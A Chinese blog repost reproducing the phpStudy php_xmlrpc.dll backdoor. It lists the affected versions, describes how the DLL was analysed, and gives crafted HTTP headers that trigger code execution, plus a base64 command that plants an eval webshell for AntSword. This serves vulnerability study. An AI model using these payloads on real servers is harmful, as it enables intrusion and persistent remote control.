返回顶部
首页 > 资讯 > 后端开发 > PHP编程 >Phpstudy后门漏洞复现
  • 385
分享到

Phpstudy后门漏洞复现

安全php开发语言web安全 2023-09-05 12:09:25 385人浏览 泡泡鱼
摘要

一、漏洞简介 2019年9月20日,网上传出 phpStudy 软件存在后门,随后作者立即发布声明进行澄清,其真实情况是该软件官网于2016年被非法入侵,程序包自带PHP的PHP_xmlrpc.dll模块被植入隐藏后门,经过分析除了有反向连

一、漏洞简介

2019年9月20日,网上传出 phpStudy 软件存在,随后作者立即发布声明进行澄清,其真实情况是该软件官网于2016年被非法入侵,程序包自带PHP的PHP_xmlrpc.dll模块被植入隐藏,经过分析除了有反向连接木马之外,还可以正向执行任意php代码。

二、漏洞影响版本

phpstudy 2016

php\php-5.2.17\ext\php_xmlrpc.dll

php\php-5.4.45\ext\php_xmlrpc.dll

Phpstudy 2018 的php-5.2.17、php-5.4.45

PHPTutorial\php\php-5.2.17\ext\php_xmlrpc.dll PHPTutorial\php\php-5.4.45\ext\php_xmlrpc.dll、

三、复现过程

分析过程

  • 定位特征字符串位置

  • 静态分析传参数据

  • 动态调试构造传参内容

php_xmlrpc.dll

PHPstudy 2018与2016两个版本的里的PHP5.2与PHP5.4版本里的恶意php_xmlrpc.dll一致。

定位特征字符串位置

根据\@eval()这个代码执行函数定位到引用位置。\@是PHP提供的错误信息屏蔽专用符号。Eval()可执行php代码,中间%s格式符为字符串传参。函数地址为:0x100031F0

 

静态分析传参数据

通过F5查看代码,分析代码流程,判断条件是有全局变量且有Http_ACCEPT_ENcoding的时候进入内部语句。接下来有两个主要判断来做正向连接和反向连接的操作。主要有两个部分。

第一部分,正向连接:判断ACCEPT_ENCODING如果等于gzip,deflate,读取ACCEPT_CHARSE的内容做base64解密,交给zend_eval_strings()函数可以执行任意恶意代码。

构造HTTP头,把Accept-Encoding改成Accept-Encoding: gzip,deflate可以触发第一个部分。

GET /index.php HTTP/1.1
Host: www.0-sec.org
…..
Accept-Encoding: gzip,deflate
Accept-Charset:cHJpbnRmKG1kNSgzMzMpKTs=
….

 

第二部分,反向连接:判断ACCEPT_ENCODING如果等于compress,gzip,通过关键部分\@eval(gzuncompress('%s'));可以看到拼接了一段恶意代码,然后调用gzuncompress方法执行解密。

构造HTTP头,把Accept-Encoding改成Accept-Encoding: compress,gzip可以触发第二部分。

 GET /index.php HTTP/1.1
Host: www.0-sec.org
…..
Accept-Encoding:compress,gzip
….

 抓包加入accept-charset请求头,输入phpinfo();编码后的结果

 

 验证漏洞

 

# 写入命令:fputs(fopen('C:\phpStudy\PHPTutorial\WWW\shell.php','w'),'');# Base64编码命令:ZnB1dHMoZm9wZW4oJ0M6XHBocFN0dWR5XFBIUFR1dG9yaWFsXFdXV1xzaGVsbC5waHAnLCd3JyksJzw/cGhwIEBldmFsKCRfUE9TVFsxXSk7ID8+Jyk7

 蚁剑连接WEBshell

 

                                                         —————————只有流过血的手指,才能弹出世间的绝唱                                                                                                                                                                                                                                                                                     ———————泰戈尔

来源地址:https://blog.csdn.net/qq_56426046/article/details/126796979

--结束END--

本文标题: Phpstudy后门漏洞复现

本文链接: https://www.lsjlt.com/news/395317.html(转载时请注明来源链接)

有问题或投稿请发送至: 邮箱/279061341@qq.com    QQ/279061341

猜你喜欢
  • Phpstudy后门漏洞复现
    一、漏洞简介 2019年9月20日,网上传出 phpStudy 软件存在后门,随后作者立即发布声明进行澄清,其真实情况是该软件官网于2016年被非法入侵,程序包自带PHP的php_xmlrpc.dll模块被植入隐藏后门,经过分析除了有反向连...
    99+
    2023-09-05
    安全 php 开发语言 web安全
  • PhpStudy后门漏洞实战复现
    phpstudy后门事件介绍 2018年12月4日,西湖区公安分局网警大队接报案,某公司发现公司内有20余台计算机被执行危险命令,疑似远程控制抓取账号密码等计算机数据回传大量敏感信息。通过专业技术溯源...
    99+
    2023-08-31
    安全 web安全
  • phpStudy poc漏洞复现以及漏洞修复办法
    phpStudy于近日被暴露出有后门漏洞,之前的phpStudy2016,phpStudy2018部分版本,EXE程序包疑似被入侵者植入木马后门,导致许多网站及服务器被攻击,被篡改,目前我们SINE安全公司立即成立phpStudy安全应急响...
    99+
    2023-06-03
  • PHP/8.1.0-dev 后门命令执行漏洞复现
    地址: 青少年CTF训练平台 | 原中学生CTF平台 | 青少年CTF 进入环境 没有发现什么点,目录扫描也没有结果,打开bp抓包  结合题目提示 题目描述:题目利用了PHP某一开发版本的重大后门,可以利用某写东西进行代码执行。 ...
    99+
    2023-09-14
    php 安全 web安全
  • PHP-8.1.0-dev 后门命令执行漏洞复现
    PHP-8.1.0-dev 后门命令执行漏洞复现 文章目录 PHP-8.1.0-dev 后门命令执行漏洞复现1. 概述1.1 PHP1.2 漏洞简述1.4 影响范围1.5 漏洞详情 2. ...
    99+
    2023-09-02
    php 安全 web安全
  • 威胁快报|Bulehero挖矿蠕虫升级,PhpStudy后门漏洞加入武器库
    概述...
    99+
    2024-04-02
  • XSS漏洞总结和漏洞复现
    XSS漏洞总结和漏洞复现 XSS漏洞概述:类型一:反射型类型二:存储型类型三:DOM型 复现20字符短域名绕过一、安装BEEFhttps://blog.csdn.net/weixin_45...
    99+
    2023-09-28
    xss php 前端
  • 【文件上传漏洞】user.ini留后门
    一、什么是.user.ini? php.ini是php默认的配置文件。其中包含四种配置, 在PHP_INI_USER的配置项中,提到.user.ini。 这里作用解释如下: 除了主 php.ini 之外,PHP 还会在每个目录下扫描 ...
    99+
    2023-09-03
    php 开发语言
  • PhpStudy 后门分析
    作者:Hcamael@知道创宇404实验室时间:2019年9月26日背景介绍2019/09/20,一则杭州警方通报打击涉网违法犯罪专项行动战果的新闻出现在我的朋友圈,其中通报了警方发现PhpStudy软件被种入后门后进行的侦查和逮捕了犯罪嫌...
    99+
    2023-06-04
  • CSRF漏洞复现
    目录标题 原理如何实现和xss区别危害CSRF实战(pikachu)dvwa靶场 CSRF(Cross Site Request Forgery)。跨站请求伪造 原理 攻击者会伪造一...
    99+
    2023-09-06
    csrf php 服务器
  • Nginx漏洞复现
    前言https://blog.csdn.net/weixin_58163202/article/details/ Nginx 是一款轻量级的 Web 服务器、反向代理服务器及电子邮件(IMAP/POP3)代理服务器,并在一个 BSD-li...
    99+
    2023-09-22
    nginx 前端 安全 Powered by 金山文档
  • Apache漏洞复现
    目录 1.Apache多后缀解析漏洞复现(apache_parsing_vulnerability)漏洞防御 2.Apache换行解析漏洞复现(CVE-2017-15715)漏洞防御 ...
    99+
    2023-09-01
    apache php 开发语言
  • 复现myucms v2.1.1022漏洞
    漏洞列表 漏洞类型复现任意文件上传√配置文件覆盖√任意文件上传2√跨站脚本漏洞√任意文件删除√任意文件下载√sql注入√ 复现漏洞 任意文件上传1 漏洞成因 展示位置: 代码位置: myucms-v...
    99+
    2023-09-17
    php 漏洞复现 渗透测试
  • [漏洞复现]Thinkphp RCE
    文章目录 简介影响版本复现文件包含目录穿越 修复 简介 Thinkphp 是一款 PHP 框架,如果开启了多语言功能,就可以通过 get、header、cookie 等位置传入参...
    99+
    2023-09-16
    php
  • vulhub-thinkphp漏洞复现
    vulhub-thinkphp漏洞复现 https://silentx.gitee.io/2022/09/06/thinkphp/ 一.ThinkPHP 2.x 任意代码执行漏洞 1.概述 漏洞...
    99+
    2023-09-21
    网络安全 php
  • 帝国Cms7.5后台getshell | (CVE-2018-18086)漏洞复现
    文章目录 一、简述👋二、安装环境👋三、漏洞复现👋四、原理分析👋 一、简述👋 漏洞描述 EmpireCMS...
    99+
    2023-08-31
    php 安全 web安全
  • Nginx解析漏洞复现
    1、漏洞描述 版本信息: Nginx 1.x 最新版PHP 7.x最新版 由此可知,该漏洞与Nginx、php版本无关,属于用户配置不当造成的解析漏洞。 2、漏洞原理 由于nginx.conf的如下配置导致nginx把以’.php’结尾的...
    99+
    2023-09-27
    安全
  • 通达oa漏洞复现 
    通达OAget_contactlist.php敏感信息泄露漏洞复现 漏洞描述 通达OA(OfficeAnywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综...
    99+
    2023-09-16
    安全性测试 威胁分析 Powered by 金山文档
  • Nacos漏洞总结复现
     Nacos漏洞总结复现 一、Nacos默认key导致权限绕过登陆 0x00 漏洞描述 Nacos中发现影响Nacos {Hostname}}{Hostname}} User-Agent: Moz...
    99+
    2023-10-08
    安全 web安全 网络 java 开发语言
  • CVE-2022-30887漏洞复现
    多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。 该CM...
    99+
    2023-09-11
    php 开发语言 安全 网络 服务器
软考高级职称资格查询
编程网,编程工程师的家园,是目前国内优秀的开源技术社区之一,形成了由开源软件库、代码分享、资讯、协作翻译、讨论区和博客等几大频道内容,为IT开发者提供了一个发现、使用、并交流开源技术的平台。
  • 官方手机版

  • 微信公众号

  • 商务合作